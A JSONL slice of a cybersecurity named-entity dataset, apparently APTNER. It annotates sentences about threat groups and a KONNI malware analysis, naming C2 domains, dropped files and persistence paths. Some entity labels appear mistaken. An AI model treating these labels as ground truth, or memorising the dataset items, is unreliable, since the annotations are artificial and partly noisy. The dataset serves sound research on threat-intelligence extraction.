{"text": "The group has been attributed to the Chinese People ’s Liberation Army ’s ( PLA ) Chengdu Military Region Second Technical Reconnaissance Bureau ( Military Unit Cover Designator 78020 ) .", "spans": {"Organization: Chinese People ’s Liberation Army ’s": [[37, 73]], "Organization: PLA": [[76, 79]], "Organization: Chengdu Military Region Second Technical Reconnaissance Bureau": [[82, 144]], "Organization: Military Unit Cover Designator 78020": [[147, 183]]}, "info": {"id": "aptner_train_002879", "source": "aptner_train"}}
{"text": "While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": {"Organization: Naikon": [[6, 12]], "Organization: APT30": [[46, 51]]}, "info": {"id": "aptner_train_002880", "source": "aptner_train"}}
{"text": "APT39 : Chafer .", "spans": {"Organization: APT39": [[0, 5]], "Organization: Chafer": [[8, 14]]}, "info": {"id": "aptner_train_002881", "source": "aptner_train"}}
{"text": "APT39 is Iranian cyber espionage group that has been active since at least 2014 .", "spans": {"Organization: APT39": [[0, 5]]}, "info": {"id": "aptner_train_002882", "source": "aptner_train"}}
{"text": "They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran 's national priorities .", "spans": {}, "info": {"id": "aptner_train_002883", "source": "aptner_train"}}
{"text": "APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity .", "spans": {"Organization: APT41": [[0, 5]]}, "info": {"id": "aptner_train_002884", "source": "aptner_train"}}
{"text": "APT41 has been active since as early as 2012 .", "spans": {"Organization: APT41": [[0, 5]]}, "info": {"id": "aptner_train_002885", "source": "aptner_train"}}
{"text": "The group has been observed targeting healthcare , telecom , technology , and video game industries in 14 countries .", "spans": {}, "info": {"id": "aptner_train_002886", "source": "aptner_train"}}
{"text": "Axiom : Group72 .", "spans": {"Organization: Axiom": [[0, 5]], "Organization: Group72": [[8, 15]]}, "info": {"id": "aptner_train_002887", "source": "aptner_train"}}
{"text": "Axiom is a cyber espionage group suspected to be associated with the Chinese government .", "spans": {"Organization: Axiom": [[0, 5]]}, "info": {"id": "aptner_train_002888", "source": "aptner_train"}}
{"text": "It is responsible for the Operation SMN campaign .", "spans": {}, "info": {"id": "aptner_train_002889", "source": "aptner_train"}}
{"text": "Though both this group and O Winnti Group use the malware O Winnti , the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting .", "spans": {"Organization: Winnti": [[29, 35], [60, 66]]}, "info": {"id": "aptner_train_002890", "source": "aptner_train"}}
{"text": "Suckfly is a China based threat group that has been active since at least 2014 .", "spans": {"Organization: Suckfly": [[0, 7]]}, "info": {"id": "aptner_train_002891", "source": "aptner_train"}}
{"text": "TA459 is a threat group believed to operate out of China that has targeted countries including Russia , Belarus , Mongolia , and others .", "spans": {"Organization: TA459": [[0, 5]]}, "info": {"id": "aptner_train_002892", "source": "aptner_train"}}
{"text": "TA505 is a financially motivated threat group that has been active since at least 2014 .", "spans": {"Organization: TA505": [[0, 5]]}, "info": {"id": "aptner_train_002893", "source": "aptner_train"}}
{"text": "The group is known for frequently changing malware and driving global trends in criminal malware distribution .", "spans": {}, "info": {"id": "aptner_train_002894", "source": "aptner_train"}}
{"text": "Magic Hound : Rocket Kitten , Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish , Newscaster , Cobalt Gypsy , APT35 .", "spans": {"Organization: Magic Hound": [[0, 11]], "Organization: Rocket Kitten": [[14, 27]], "Organization: Operation Saffron Rose": [[30, 52]], "Organization: Ajax Security Team": [[55, 73]], "Organization: Operation Woolen-Goldfish": [[76, 101]], "Organization: Newscaster": [[104, 114]], "Organization: Cobalt Gypsy": [[117, 129]], "Organization: APT35": [[132, 137]]}, "info": {"id": "aptner_train_002895", "source": "aptner_train"}}
{"text": "Magic Hound is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014 .", "spans": {"Organization: Magic Hound": [[0, 11]]}, "info": {"id": "aptner_train_002896", "source": "aptner_train"}}
{"text": "The group behind the campaign has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . menuPass : Stone Panda , APT10 , Red Apollo , CVNX , HOGFISH . menuPass is a threat group that appears to originate from China and has been active since approximately 2009 .", "spans": {"Organization: menuPass": [[186, 194], [249, 257]], "Organization: Stone Panda": [[197, 208]], "Organization: APT10": [[211, 216]], "Organization: Red Apollo": [[219, 229]], "Organization: CVNX": [[232, 236]], "Organization: HOGFISH": [[239, 246]]}, "info": {"id": "aptner_train_002897", "source": "aptner_train"}}
{"text": "The group has targeted healthcare , defense , aerospace , and government sectors , and has targeted Japanese victims since at least 2014 .", "spans": {}, "info": {"id": "aptner_train_002898", "source": "aptner_train"}}
{"text": "In 2016 and 2017 , the group targeted managed IT service providers , manufacturing and mining companies , and a university .", "spans": {}, "info": {"id": "aptner_train_002899", "source": "aptner_train"}}
{"text": "Moafee is a threat group that appears to operate from the Guandong Province of China .", "spans": {"Organization: Moafee": [[0, 6]]}, "info": {"id": "aptner_train_002900", "source": "aptner_train"}}
{"text": "Due to overlapping TTPs , including similar custom tools , Moafee is thought to have a direct or indirect relationship with the threat group DragonOK .", "spans": {"Organization: Moafee": [[59, 65]], "Organization: group DragonOK": [[135, 149]]}, "info": {"id": "aptner_train_002901", "source": "aptner_train"}}
{"text": "SilverTerrier is a Nigerian threat group that has been seen active since 2014 .", "spans": {"Organization: SilverTerrier": [[0, 13]]}, "info": {"id": "aptner_train_002902", "source": "aptner_train"}}
{"text": "SilverTerrier mainly targets organizations in high technology , higher education , and manufacturing .", "spans": {"Organization: SilverTerrier": [[0, 13]]}, "info": {"id": "aptner_train_002903", "source": "aptner_train"}}
{"text": "Operation Soft Cell is a group that is reportedly affiliated with China and is likely state-sponsored .", "spans": {"Organization: Soft Cell": [[10, 19]]}, "info": {"id": "aptner_train_002904", "source": "aptner_train"}}
{"text": "The group has operated since at least 2012 and has compromised high-profile telecommunications networks .", "spans": {"Organization: high-profile telecommunications networks": [[63, 103]]}, "info": {"id": "aptner_train_002905", "source": "aptner_train"}}
{"text": "Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia , particularly government entities , since at least 2015 .", "spans": {"Organization: Sowbug": [[0, 6]], "Organization: government entities": [[134, 153]]}, "info": {"id": "aptner_train_002906", "source": "aptner_train"}}
{"text": "Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan , the Philippines , and Hong Kong .", "spans": {"Organization: Tropic Trooper": [[0, 14]]}, "info": {"id": "aptner_train_002907", "source": "aptner_train"}}
{"text": "Tropic Trooper focuses on targeting government , healthcare , transportation , and high-tech industries and has been active since 2011 .", "spans": {"Organization: Tropic Trooper": [[0, 14]], "Organization: government": [[36, 46]]}, "info": {"id": "aptner_train_002908", "source": "aptner_train"}}
{"text": "Turla : Waterbug , WhiteBear , VENOMOUS BEAR , Snake , Krypton .", "spans": {"Organization: Turla": [[0, 5]], "Organization: Waterbug": [[8, 16]], "Organization: WhiteBear": [[19, 28]], "Organization: VENOMOUS BEAR": [[31, 44]], "Organization: Snake": [[47, 52]], "Organization: Krypton": [[55, 62]]}, "info": {"id": "aptner_train_002909", "source": "aptner_train"}}
{"text": "Turla is a Russian-based threat group that has infected victims in over 45 countries , spanning a range of industries including government , embassies , military , education , research and pharmaceutical companies since 2004 .", "spans": {"Organization: Turla": [[0, 5]], "Organization: government": [[128, 138]], "Organization: embassies": [[141, 150]], "Organization: military": [[153, 161]], "Organization: pharmaceutical companies": [[189, 213]]}, "info": {"id": "aptner_train_002910", "source": "aptner_train"}}
{"text": "Heightened activity was seen in mid-2015 .", "spans": {}, "info": {"id": "aptner_train_002911", "source": "aptner_train"}}
{"text": "Turla is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware .", "spans": {"Organization: Turla": [[0, 5]], "System: leveraging in-house tools": [[76, 101]], "Malware: malware": [[106, 113]]}, "info": {"id": "aptner_train_002912", "source": "aptner_train"}}
{"text": "Turla ’s espionage platform is mainly used against Windows machines , but has also been seen used against macOS and Linux machines .", "spans": {"Organization: Turla": [[0, 5]], "System: Windows": [[51, 58]], "System: macOS": [[106, 111]], "System: Linux": [[116, 121]]}, "info": {"id": "aptner_train_002913", "source": "aptner_train"}}
{"text": "Winnti Group : Blackfly .", "spans": {"Organization: Winnti Group": [[0, 12]], "Organization: Blackfly": [[15, 23]]}, "info": {"id": "aptner_train_002914", "source": "aptner_train"}}
{"text": "Winnti Group is a threat group with Chinese origins that has been active since at least 2010 .", "spans": {"Organization: Winnti Group": [[0, 12]]}, "info": {"id": "aptner_train_002915", "source": "aptner_train"}}
{"text": "The group has heavily targeted the gaming industry , but it has also expanded the scope of its targeting .", "spans": {}, "info": {"id": "aptner_train_002916", "source": "aptner_train"}}
{"text": "Some reporting suggests a number of other groups , including Axiom , APT17 , and Ke3chang , are closely linked to Winnti Group .", "spans": {"Organization: Axiom": [[61, 66]], "Organization: APT17": [[69, 74]], "Organization: Ke3chang": [[81, 89]], "Organization: Winnti Group": [[114, 126]]}, "info": {"id": "aptner_train_002917", "source": "aptner_train"}}
{"text": "Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists , activists , and dissidents since at least 2012 .", "spans": {"Organization: Stealth Falcon": [[0, 14]]}, "info": {"id": "aptner_train_002918", "source": "aptner_train"}}
{"text": "Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates ( UAE ) government , but that has not been confirmed .", "spans": {"Organization: United Arab Emirates ( UAE ) government": [[82, 121]]}, "info": {"id": "aptner_train_002919", "source": "aptner_train"}}
{"text": "The group appears to have targeted academic institutions , but its motives remain unclear .", "spans": {}, "info": {"id": "aptner_train_002921", "source": "aptner_train"}}
{"text": "Strider : ProjectSauron . Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia , China , Sweden , Belgium , Iran , and Rwanda .", "spans": {"Organization: Strider": [[0, 7], [26, 33]], "Organization: ProjectSauron ": [[10, 24]]}, "info": {"id": "aptner_train_002922", "source": "aptner_train"}}
{"text": "Putter Panda : APT2 , MSUpdater .", "spans": {"Organization: Putter Panda": [[0, 12]], "Organization: APT2": [[15, 19]], "Organization: MSUpdater": [[22, 31]]}, "info": {"id": "aptner_train_002923", "source": "aptner_train"}}
{"text": "Rancor is a threat group that has led targeted campaigns against the South East Asia region .", "spans": {"Organization: Rancor": [[0, 6]]}, "info": {"id": "aptner_train_002925", "source": "aptner_train"}}
{"text": "Rancor uses politically-motivated lures to entice victims to open malicious documents .", "spans": {"Organization: Rancor": [[0, 6]], "System: politically-motivated lures": [[12, 39]]}, "info": {"id": "aptner_train_002926", "source": "aptner_train"}}
{"text": "The group uses a Trojan by the same name ( RTM ) .", "spans": {"Malware: Trojan": [[17, 23]], "Organization: RTM": [[43, 46]]}, "info": {"id": "aptner_train_002928", "source": "aptner_train"}}
{"text": "FIN4 is a financially motivated threat group that has targeted confidential information related to the public financial market , particularly regarding healthcare and pharmaceutical companies , since at least 2013 .", "spans": {"Organization: FIN4": [[0, 4]]}, "info": {"id": "aptner_train_002929", "source": "aptner_train"}}
{"text": "FIN4 is unique in that they do not infect victims with typical persistent malware , but rather they focus on capturing credentials authorized to access email and other non-public correspondence .", "spans": {"Organization: FIN4": [[0, 4]], "System: email": [[152, 157]]}, "info": {"id": "aptner_train_002930", "source": "aptner_train"}}
{"text": "FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information .", "spans": {"Organization: FIN5": [[0, 4]]}, "info": {"id": "aptner_train_002931", "source": "aptner_train"}}
{"text": "The group has been active since at least 2008 and has targeted the restaurant , gaming , and hotel industries .", "spans": {}, "info": {"id": "aptner_train_002932", "source": "aptner_train"}}
{"text": "The group is made up of actors who likely speak Russian .", "spans": {}, "info": {"id": "aptner_train_002933", "source": "aptner_train"}}
{"text": "FIN6 : ITG08 .", "spans": {"Organization: FIN6": [[0, 4]], "Organization: ITG08": [[7, 12]]}, "info": {"id": "aptner_train_002934", "source": "aptner_train"}}
{"text": "FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces .", "spans": {"Organization: FIN6": [[0, 4]]}, "info": {"id": "aptner_train_002935", "source": "aptner_train"}}
{"text": "This group has aggressively targeted and compromised point of sale ( PoS ) systems in the hospitality and retail sectors .", "spans": {}, "info": {"id": "aptner_train_002936", "source": "aptner_train"}}
{"text": "Leviathan : TEMP.Jumper , APT40 , TEMP.Periscope .", "spans": {"Organization: Leviathan": [[0, 9]], "Organization: TEMP.Jumper": [[12, 23]], "Organization: APT40": [[26, 31]], "Organization: TEMP.Periscope": [[34, 48]]}, "info": {"id": "aptner_train_002937", "source": "aptner_train"}}
{"text": "Leviathan is a cyber espionage group that has been active since at least 2013 .", "spans": {"Organization: Leviathan": [[0, 9]]}, "info": {"id": "aptner_train_002938", "source": "aptner_train"}}
{"text": "The group generally targets defense and government organizations , but has also targeted a range of industries including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities in the United States , Western Europe , and along the South China Sea .", "spans": {}, "info": {"id": "aptner_train_002939", "source": "aptner_train"}}
{"text": "Lotus Blossom : DRAGONFISH , Spring Dragon .", "spans": {"Organization: Lotus Blossom": [[0, 13]], "Organization: DRAGONFISH": [[16, 26]], "Organization: Spring Dragon": [[29, 42]]}, "info": {"id": "aptner_train_002940", "source": "aptner_train"}}
{"text": "Machete : El Machete .", "spans": {"Organization: Machete": [[0, 7]], "Organization: El Machete": [[10, 20]]}, "info": {"id": "aptner_train_002942", "source": "aptner_train"}}
{"text": "Machete is a group that has been active since at least 2010 , targeting high-profile government entities in Latin American countries .", "spans": {"Organization: Machete": [[0, 7]]}, "info": {"id": "aptner_train_002943", "source": "aptner_train"}}
{"text": "admin@338 is a China based cyber threat group .", "spans": {"Organization: admin@338": [[0, 9]]}, "info": {"id": "aptner_train_002944", "source": "aptner_train"}}
{"text": "It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial , economic , and trade policy , typically using publicly available RATs such as PoisonIvy , as well as some non-public backdoors .", "spans": {"Malware: RATs": [[199, 203]], "Malware: PoisonIvy": [[212, 221]], "Malware: non-public backdoors": [[240, 260]]}, "info": {"id": "aptner_train_002945", "source": "aptner_train"}}
{"text": "APT1 : Comment Crew , Comment Group , Comment Panda .", "spans": {"Organization: APT1": [[0, 4]], "Organization: Comment Crew": [[7, 19]], "Organization: Comment Group": [[22, 35]], "Organization: Comment Panda": [[38, 51]]}, "info": {"id": "aptner_train_002946", "source": "aptner_train"}}
{"text": "APT12 : IXESHE , DynCalc , Numbered Panda , DNSCALC .", "spans": {"Organization: APT12": [[0, 5]], "Organization: IXESHE": [[8, 14]], "Organization: DynCalc": [[17, 24]], "Organization: Numbered Panda": [[27, 41]], "Organization: DNSCALC": [[44, 51]]}, "info": {"id": "aptner_train_002948", "source": "aptner_train"}}
{"text": "APT12 is a threat group that has been attributed to China .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002949", "source": "aptner_train"}}
{"text": "The group has targeted a variety of victims including but not limited to media outlets , high-tech companies , and multiple governments .", "spans": {"Organization: media outlets": [[73, 86]], "Organization: high-tech companies": [[89, 108]], "Organization: multiple governments": [[115, 135]]}, "info": {"id": "aptner_train_002950", "source": "aptner_train"}}
{"text": "FANCY BEAR ( also known as Sofacy or APT28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": {"Organization: FANCY BEAR": [[0, 10]], "Organization: Sofacy": [[27, 33]], "Organization: APT28": [[37, 42]], "Organization: Aerospace": [[198, 207]], "Organization: Defense": [[210, 217]], "Organization: Energy": [[220, 226]], "Organization: Government": [[229, 239]], "Organization: Media sectors": [[244, 257]]}, "info": {"id": "aptner_train_003024", "source": "aptner_train"}}
{"text": "However , three themes in APT28 's targeting clearly reflects LOCs of specific interest to an Eastern European government , most likely the Russian government .", "spans": {"Organization: APT28": [[26, 31]], "Organization: government": [[111, 121]], "Organization: Russian government": [[140, 158]]}, "info": {"id": "aptner_train_003026", "source": "aptner_train"}}
{"text": "Our visibility into the operations of APT28 - a group we believe the Russian government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": {"Organization: APT28": [[38, 43]], "Organization: Russian government": [[69, 87]], "Organization: government": [[137, 147]]}, "info": {"id": "aptner_train_003040", "source": "aptner_train"}}
{"text": "APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"Organization: APT28": [[0, 5]], "Vulnerability: EternalBlue": [[46, 57]], "Vulnerability: exploits": [[58, 66]], "Malware: open source tool": [[75, 91]], "Malware: Responder": [[92, 101]]}, "info": {"id": "aptner_train_003070", "source": "aptner_train"}}
{"text": "The Sofacy threat group continues to target government organizations in the EU , US , and former Soviet states to deliver the Zebrocy tool as a payload .", "spans": {"Organization: Sofacy threat group": [[4, 23]], "Organization: government organizations": [[44, 68]], "Malware: Zebrocy tool": [[126, 138]]}, "info": {"id": "aptner_train_003079", "source": "aptner_train"}}
{"text": "Importantly , PinchDuke trojan samples alACTs contain a notable text string , which we believe is used as a campaign identifier by the Dukes group to distinguish between multiple attack campaigns that are run in parallel .", "spans": {"Malware: PinchDuke trojan samples": [[14, 38]], "Organization: Dukes group": [[135, 146]]}, "info": {"id": "aptner_train_003090", "source": "aptner_train"}}
{"text": "Secondly , the value the Dukes intended to gain from these MiniDuke campaigns may have been so great that they deemed it worth the risk of getting noticed .", "spans": {"Organization: Dukes": [[25, 30]]}, "info": {"id": "aptner_train_003094", "source": "aptner_train"}}
{"text": "This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard TIME timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": {"Malware: GeminiDuke samples": [[74, 92]], "Malware: GeminiDuke": [[237, 247]]}, "info": {"id": "aptner_train_003104", "source": "aptner_train"}}
{"text": "APT38 .", "spans": {"Organization: APT38": [[0, 5]]}, "info": {"id": "aptner_train_003239", "source": "aptner_train"}}
{"text": "From March 18 to 26 we observed the malware operating in multiple LOCs of the world .", "spans": {}, "info": {"id": "aptner_train_003547", "source": "aptner_train"}}
{"text": "KONNI : A Malware Under The Radar For Years .", "spans": {"Malware: KONNI": [[0, 5]], "System: Radar": [[28, 33]]}, "info": {"id": "aptner_train_003556", "source": "aptner_train"}}
{"text": "During this time it has managed to avoid scrutiny by the security community .", "spans": {}, "info": {"id": "aptner_train_003558", "source": "aptner_train"}}
{"text": "The current version of the malware allows the operator to steal files , keystrokes , perform screenshots , and execute arbitrary code on the infected host .", "spans": {}, "info": {"id": "aptner_train_003559", "source": "aptner_train"}}
{"text": "Talos has named this malware KONNI .", "spans": {"Organization: Talos": [[0, 5]], "Malware: KONNI": [[29, 34]]}, "info": {"id": "aptner_train_003560", "source": "aptner_train"}}
{"text": "Throughout the multiple campaigns observed over the last 3 years , the actor has used an email attachment as the initial infection vector .", "spans": {}, "info": {"id": "aptner_train_003561", "source": "aptner_train"}}
{"text": "They then use additional social engineering to prompt the target to open a .scr file , display a decoy document to the users , and finally execute the malware on the victim's machine .", "spans": {"Indicator: .scr": [[75, 79]]}, "info": {"id": "aptner_train_003562", "source": "aptner_train"}}
{"text": "The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost .", "spans": {}, "info": {"id": "aptner_train_003563", "source": "aptner_train"}}
{"text": "The malware has evolved over time .", "spans": {}, "info": {"id": "aptner_train_003564", "source": "aptner_train"}}
{"text": "In this article , we will analyse this evolution: at the beginning the malware was only an information stealer without remote administration , it moved from a single file malware to a dual file malware (an executable and a dynamic library ) , the malware has supported more and more features over the time , the decoy documents have become more and more advanced .", "spans": {"System: dynamic library": [[223, 238]]}, "info": {"id": "aptner_train_003565", "source": "aptner_train"}}
{"text": "The different versions contain copy/pasted code from previous versions .", "spans": {}, "info": {"id": "aptner_train_003566", "source": "aptner_train"}}
{"text": "Moreover the new version searches for files generated by previous versions .", "spans": {}, "info": {"id": "aptner_train_003567", "source": "aptner_train"}}
{"text": "This evolution is illustrated across 4 campaigns : one in 2014 , one in 2016 and finally two in 2017 .", "spans": {}, "info": {"id": "aptner_train_003568", "source": "aptner_train"}}
{"text": "The decoy document of the 2 last campaigns suggests that the targets are public organisations .", "spans": {}, "info": {"id": "aptner_train_003569", "source": "aptner_train"}}
{"text": "Both documents contained email addresses , phone numbers and contacts of members of official organizations such as United Nations , UNICEF , and Embassies linked to North Korea .", "spans": {"System: email": [[25, 30]], "Organization: official organizations": [[84, 106]], "Organization: United Nations": [[115, 129]], "Organization: UNICEF": [[132, 138]], "Organization: Embassies": [[145, 154]]}, "info": {"id": "aptner_train_003570", "source": "aptner_train"}}
{"text": "In this campaign , the dropper filename was beauty.scr .", "spans": {"Indicator: beauty.scr": [[44, 54]]}, "info": {"id": "aptner_train_003571", "source": "aptner_train"}}
{"text": "Based on the compilation date of the two binaries , this campaign took place in September 2014 .", "spans": {}, "info": {"id": "aptner_train_003572", "source": "aptner_train"}}
{"text": "Once executed , two files were dropped on the targeted system : a decoy document (a picture) and a fake svchost.exe binary .", "spans": {"Indicator: svchost.exe": [[104, 115]]}, "info": {"id": "aptner_train_003573", "source": "aptner_train"}}
{"text": "Both files were stored in \"C:\\Windows\" .", "spans": {"Indicator: \"C:\\Windows\"": [[26, 38]]}, "info": {"id": "aptner_train_003574", "source": "aptner_train"}}
{"text": "The fake svchost binary is the KONNI malware .", "spans": {"Malware: KONNI": [[31, 36]]}, "info": {"id": "aptner_train_003575", "source": "aptner_train"}}
{"text": "The first task of the malware is to generate an ID to identify the infected system .", "spans": {}, "info": {"id": "aptner_train_003576", "source": "aptner_train"}}
{"text": "This ID is generated based on the installation date of the system .", "spans": {}, "info": {"id": "aptner_train_003577", "source": "aptner_train"}}
{"text": "The second task of malware is to ping the CC and get orders .", "spans": {}, "info": {"id": "aptner_train_003578", "source": "aptner_train"}}
{"text": "The malware includes 2 domains: phpschboy.prohosts.org , jams481.site.bz .", "spans": {"Indicator: phpschboy.prohosts.org": [[32, 54]], "Indicator: jams481.site.bz": [[57, 72]]}, "info": {"id": "aptner_train_003579", "source": "aptner_train"}}
{"text": "The developer used the Microsoft Winsocks API to handle the network connection .", "spans": {"System: Microsoft Winsocks API": [[23, 45]]}, "info": {"id": "aptner_train_003580", "source": "aptner_train"}}
{"text": "Surprisingly , this isn't the easiest or the most efficient technical choice for HTTP connection .", "spans": {}, "info": {"id": "aptner_train_003581", "source": "aptner_train"}}
{"text": "The malware samples we analysed connected to only one URI: <c2-domain>/login.php .", "spans": {"Indicator: <c2-domain>/login.php": [[59, 80]]}, "info": {"id": "aptner_train_003582", "source": "aptner_train"}}
{"text": "This version of KONNI is not designed to execute code on the infected system .", "spans": {"Malware: KONNI": [[16, 21]]}, "info": {"id": "aptner_train_003583", "source": "aptner_train"}}
{"text": "The purpose is to be executed only once and steal data on the infected system , here are the main features : Keyloggers , Clipboard stealer , Firefox profiles and cookies stealer , Chrome profiles and cookies stealer , Opera profiles and cookies stealer .", "spans": {"System: Firefox": [[142, 149]], "System: Chrome": [[181, 187]], "Organization: Opera": [[219, 224]]}, "info": {"id": "aptner_train_003584", "source": "aptner_train"}}
{"text": "The name of the .scr file was directly linked to tension between North Korea and USA in March 2016 more information .", "spans": {"Indicator: .scr": [[16, 20]]}, "info": {"id": "aptner_train_003585", "source": "aptner_train"}}
{"text": "Based on the compilation dates of the binaries , the campaign took place in the same period .", "spans": {}, "info": {"id": "aptner_train_003586", "source": "aptner_train"}}
{"text": "An interesting fact : the dropped library was compiled in 2014 and appears in our telemetry in August 2015 .", "spans": {}, "info": {"id": "aptner_train_003587", "source": "aptner_train"}}
{"text": "Indicating that this library was probably used in another campaign .", "spans": {}, "info": {"id": "aptner_train_003588", "source": "aptner_train"}}
{"text": "The .scr file contains 2 Office documents .", "spans": {"Indicator: .scr": [[4, 8]], "System: Office": [[25, 31]]}, "info": {"id": "aptner_train_003589", "source": "aptner_train"}}
{"text": "The first document was in English and a second in Russian .", "spans": {}, "info": {"id": "aptner_train_003590", "source": "aptner_train"}}
{"text": "In the sample only the English version can be displayed to the user (that is hardcoded in the sample) .", "spans": {}, "info": {"id": "aptner_train_003591", "source": "aptner_train"}}
{"text": "The Russian document is not used by the sample , we assume that the author of the malware forgot to remove the resource containing the Russia decoy document .", "spans": {}, "info": {"id": "aptner_train_003592", "source": "aptner_train"}}
{"text": "The malware author changed the malware architecture , this version is divided in two binaries: conhote.dll , winnit.exe .", "spans": {"Indicator: conhote.dll": [[95, 106]], "Indicator: winnit.exe": [[109, 119]]}, "info": {"id": "aptner_train_003593", "source": "aptner_train"}}
{"text": "Another difference is the directory where the files are dropped , it's no longer C:\\Windows but rather the local setting of the current user (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe) .", "spans": {"Indicator: C:\\Windows": [[81, 91]], "Indicator: (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe)": [[141, 189]]}, "info": {"id": "aptner_train_003594", "source": "aptner_train"}}
{"text": "Thanks to this modification , the malware can be executed with a non-administrator account .", "spans": {}, "info": {"id": "aptner_train_003595", "source": "aptner_train"}}
{"text": "The .dll file is executed by the .exe file .", "spans": {"Indicator: .dll": [[4, 8]], "Indicator: .exe": [[33, 37]]}, "info": {"id": "aptner_train_003596", "source": "aptner_train"}}
{"text": "In this version , a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk .", "spans": {"Indicator: winnit.exe": [[59, 69]], "Indicator: %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk": [[92, 156]]}, "info": {"id": "aptner_train_003597", "source": "aptner_train"}}
{"text": "As you can see the attacker has went to great lengths to disguise his service as a legitimate Antivirus Service by using the name 'Anti virus service.lnk' .", "spans": {"System: Antivirus Service": [[94, 111]], "Indicator: 'Anti virus service.lnk'": [[130, 154]]}, "info": {"id": "aptner_train_003598", "source": "aptner_train"}}
{"text": "This is of course simple but often it can be enough for a user to miss something malicious by name .", "spans": {}, "info": {"id": "aptner_train_003599", "source": "aptner_train"}}
{"text": "As in the previous version , the ID of the infected system is generated with exactly the same method .", "spans": {}, "info": {"id": "aptner_train_003600", "source": "aptner_train"}}
{"text": "The C2 is different and the analysed version this time only contains a single domain: dowhelsitjs.netau.net .", "spans": {"System: C2": [[4, 6]], "Indicator: dowhelsitjs.netau.net": [[86, 107]]}, "info": {"id": "aptner_train_003601", "source": "aptner_train"}}
{"text": "In this version , the developer used a different API , the Wininet API which make more sense for Web requests .", "spans": {"System: Wininet API": [[59, 70]]}, "info": {"id": "aptner_train_003602", "source": "aptner_train"}}
{"text": "Moreover the C2 infrastructure evolved too , more .php files are available through the web hosting: <c2-domain>/login.php <c2-domain>/upload.php <c2-domain>/download.php .", "spans": {"System: C2": [[13, 15]], "Indicator: <c2-domain>/login.php": [[100, 121]], "Indicator: <c2-domain>/upload.php": [[122, 144]], "Indicator: <c2-domain>/download.php": [[145, 169]]}, "info": {"id": "aptner_train_003603", "source": "aptner_train"}}
{"text": "This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution .", "spans": {"System: Remote Administration Tool": [[94, 120]]}, "info": {"id": "aptner_train_003604", "source": "aptner_train"}}
{"text": "The library is only used to perform keylogging and clipboard stealing .", "spans": {}, "info": {"id": "aptner_train_003605", "source": "aptner_train"}}
{"text": "Indeed , the malware author moved this part of the code from the core of the malware to a library .", "spans": {}, "info": {"id": "aptner_train_003606", "source": "aptner_train"}}
{"text": "An interesting element is that the malware looks for filenames created with the previous version of KONNI .", "spans": {"Malware: KONNI": [[100, 105]]}, "info": {"id": "aptner_train_003607", "source": "aptner_train"}}
{"text": "This implies that the malware targeted the same people as the previous version and they are designed to work together .", "spans": {}, "info": {"id": "aptner_train_003608", "source": "aptner_train"}}
{"text": "The malware internally uses the following files : solhelp.ocx sultry.ocx helpsol.ocx psltre.ocx screentmp.tmp (log file of the keylogger) spadmgr.ocx apsmgrd.ocx wpg.db .", "spans": {"Indicator: solhelp.ocx": [[50, 61]], "Indicator: sultry.ocx": [[62, 72]], "Indicator: helpsol.ocx": [[73, 84]], "Indicator: psltre.ocx": [[85, 95]], "Indicator: screentmp.tmp": [[96, 109]], "Indicator: spadmgr.ocx": [[138, 149]], "Indicator: apsmgrd.ocx": [[150, 161]], "Indicator: wpg.db": [[162, 168]]}, "info": {"id": "aptner_train_003609", "source": "aptner_train"}}
{"text": "In this campaign , the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr. The decoy document shown after infection is an Office document containing email addresses , phone numbers and contacts of members of official organizations such as the United Nations , UNICEF , Embassies linked to North Korea .", "spans": {"Indicator: RC_Office_Coordination_Associate.scr.": [[106, 143]], "System: Office": [[191, 197]], "System: email": [[218, 223]], "Organization: official organizations": [[277, 299]], "Organization: United Nations": [[312, 326]], "Organization: UNICEF": [[329, 335]], "Organization: Embassies": [[338, 347]]}, "info": {"id": "aptner_train_003610", "source": "aptner_train"}}
{"text": "The .scr files drops two files: an executable and a library .", "spans": {"Indicator: .scr": [[4, 8]]}, "info": {"id": "aptner_train_003611", "source": "aptner_train"}}
{"text": "As in the previous version , the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk ) .", "spans": {"System: Windows": [[62, 69]], "Indicator: distillist.lnk": [[99, 113]]}, "info": {"id": "aptner_train_003612", "source": "aptner_train"}}
{"text": "Contrary to the previous version , the developers moved the core of malware to the library .", "spans": {}, "info": {"id": "aptner_train_003613", "source": "aptner_train"}}
